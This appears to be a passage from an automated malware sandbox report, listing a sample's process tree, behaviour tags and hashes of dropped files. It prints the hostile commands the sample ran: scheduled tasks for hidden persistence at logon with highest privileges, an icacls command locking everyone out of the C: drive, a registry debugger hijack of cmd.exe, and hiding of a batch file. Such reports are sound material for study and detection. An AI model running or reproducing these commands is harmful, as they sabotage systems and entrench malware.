C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77$sxr-powershell.exe" /tr "'C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe'" /sc onlogon /rl HIGHEST6⤵
- Creates scheduled task(s)
PID:2912 -
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"5⤵
- Executes dropped EXE
PID:3448 -
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77BoostBot.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\BoostBot.exe'" /sc onlogon /rl HIGHEST5⤵
- Creates scheduled task(s)
PID:2456 -
C:\Windows\system32\icacls.exeicacls "C:\" /deny *S-1-1-0:(OI)(CI)F /T3⤵
- Modifies file permissions
PID:2588 -
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Executable File Execution Options\cmd.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f3⤵PID:4196
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\Temp\Fix.bat"3⤵
- Views/modifies file attributes
PID:1060
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3564
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3764
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3924
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4164
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4944
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4488
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:3828
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:1448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:4504
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
PID:368
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:3364
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2836
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3720
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:1952
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Filesize338B
MD58b5939ce90f9c01c0fb7f6aa5c98903c
SHA10db302d0e2c482a4ee43d84d7210196907bfe059
SHA256ace0e21d782e19c61280bd88657b910bf9c5eb99d9b5fad7d7cad769763ea079
SHA512c8edc146c103ef94ee1e47241b0ad0a8360261bcd97422f7c94bd75562ad2d5ba4116065d7c656e82bd16be2a9bcafa2c8e96675fa841431e7e9d90bcc04e98e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5E5B0733CDA24F9EF7038FEEB6987C6E
Filesize556B
MD52ced9657e754899c9c21e35e62cfd749
SHA128dbd30d60f4733b3eec9d19ee7d359c5d98f361
SHA25637dcdc9e04ab5281dcbed4bbdf020b3b740f69d204185da6c5b0eaa6e168d063
SHA512f3bc0cdd6d35906474eeb3a0611459c7b2a748c07a2637ed68c0c1358cfbac1ebb888fc83cbc8a3b16d194ceb2112ef1b11a05b66fd879b25090fbe367702e1b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
Filesize408B
MD55052db06a91eb8c8a739038cc002bade
SHA17f1dbd014d1c13635ba4e109fbc1f3bb152e0d6b
SHA256996281dd0067c6b4ac2edf10a674b5f38be7e6bca90b3f3224c878f0d6a83e4c
SHA512edfeff2cb63e12b1dfcbc1f0102622f37a9707e623612e1d728cd6eb042294dc22f047e737654fb0e4f019058581b1e856177f4701d5906cdb6999a31a64eac8
-
Filesize
283B
MD5c75400c3c7beb504e9d6b3a834458ecb
SHA16f59643718ba05e1e35a5d4c833e903f8b0b6dad
SHA25644388d6dfefab755e11db96f23bdba57f28e5d54951b1996a28a901631137748
SHA5128c564cc4c74dd5ac7b80a54c950ba565c47bbc8865036d1284673f3c2debe74322b979b9e925ef0315eb12b30335d625f77b0f611e041cb207a9113c0df2e036
-
Filesize
409KB
MD5404ab800bbe49c36bd64d0d73600b59a
SHA14c8dff2702fada108f7477ad357067310b584366
SHA2565465f02f24ee5c1fc9c9c27c86c209eeddc2ed607143e1b76ca9c9d9b7b84154
SHA512d0ecd88adfd84d9d8e845281e0437368aadf3d1d6fb704d7c7630d1360697471c2a49584f968eeebd5b435f11af9ce3d06327f1835fa5d07a140f22c0f95fc11
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
Filesize
224B
MD5d984f95dba925797a557b7d54cd5b33e
SHA1fd51c43e1bfad47acd849c0cbc1b3b44eb06a602
SHA2569e7f981c7272441ea30bcb30a3f4984819a8eaa4cbe2e17df3c091b1cec37e65
SHA5121af46a82dc0054527bb9c5c61fc0bb34760c53f04d2ae20584f04eed452b12972613bde778ff696617a715f5057e44682ef09610bdf97f3b0ec5bac5d1fb8c65
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
Filesize2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5aa187cac09f051e24146ad549a0f08a6
SHA12ef7fae3652bb838766627fa6584a6e3b5e74ff3
SHA2567036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f
SHA512960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize160B
MD57737ca556c4aa13674eb3008497d0b7c
SHA13bcfabc04e890f4f6a6af693855798d6f32261ff
SHA2562cc2817893d81214c0504ec7c1ac00b9712ccf1c0bd4b3b01370ea0ab81ac561
SHA51216b0d0bf36481a5c2a55a946c53ed260a0d5fd157389626d68f1a8d1f20b07fa6628237796eb4ad7dce21cd06ba7818219f2cb07cec55c9bf7fb9742e11d2bd2